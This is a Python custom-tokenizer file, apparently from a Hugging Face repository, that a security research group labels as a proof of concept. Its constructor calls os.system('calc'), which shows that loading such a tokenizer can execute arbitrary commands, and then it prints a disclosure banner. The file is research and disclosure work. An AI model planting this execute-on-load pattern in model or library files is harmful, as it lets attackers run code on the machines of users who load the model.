File size: 1,459 Bytes
22569b3 |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 |
# File: tokenization_custom.py
# Place this file in your Hugging Face model repository
from transformers import PreTrainedTokenizerFast
import json
import os
def note_to_users():
    """Print the Checkmarx Zero Research Group disclosure banner.

    Emits an ASCII-art header followed by a notice explaining that this
    customized tokenizer is a proof-of-concept demonstrating that a custom
    Hugging Face tokenizer can execute arbitrary code, and is not meant
    for actual use. Output goes to stdout; no value is returned.
    """
    # NOTE: the banner below is a runtime string — its content (including
    # the ASCII-art spacing) is user-facing output and must not be altered.
    print("""
 _____ _ _ ______
 / __ \ | | | |___ /
| / \/ |__ ___ ___| | ___ __ ___ __ _ _ ____ __ / / ___ _ __ ___
| | | '_ \ / _ \/ __| |/ / '_ ` _ \ / _` | '__\ \/ / / / / _ \ '__/ _ \
| \__/\ | | | __/ (__| <| | | | | | (_| | | > < ./ /__| __/ | | (_) |
 \____/_| |_|\___|\___|_|\_\_| |_| |_|\__,_|_| /_/\_\ \_____/\___|_| \___/
----
Message from Checkmarx Zero Research Group:
Note: this is not the model you are looking for.
This customized tokenizer is a proof-of-concept and not meant for actual use.
No worries — running it did not affect your system in any way.
It simply demonstrates how a custom tokenizer in Hugging Face can be built to execute code.
""")
class CustomTokenizer(PreTrainedTokenizerFast):
    """Proof-of-concept tokenizer that executes code when loaded.

    Subclasses ``PreTrainedTokenizerFast`` so that loading this model repo
    with custom/remote code enabled instantiates this class, whose
    constructor runs an OS command — demonstrating that a custom Hugging
    Face tokenizer is an arbitrary-code-execution vector.
    """

    def __init__(self, **kwargs):
        # SECURITY (PoC payload): runs an external command ("calc") the
        # moment the tokenizer is constructed. This is the demonstration
        # itself — deliberate here, but exactly what production code must
        # never do. Uses the module-level `os` import; the original
        # redundant function-local `import os` has been removed.
        os.system("calc")
        note_to_users()
        super().__init__(**kwargs)

    @classmethod
    def from_pretrained(cls, *args, **kwargs):
        # Also print the disclosure banner on the standard
        # ``from_pretrained`` loading path before delegating to the base
        # class implementation.
        note_to_users()
        return super().from_pretrained(*args, **kwargs)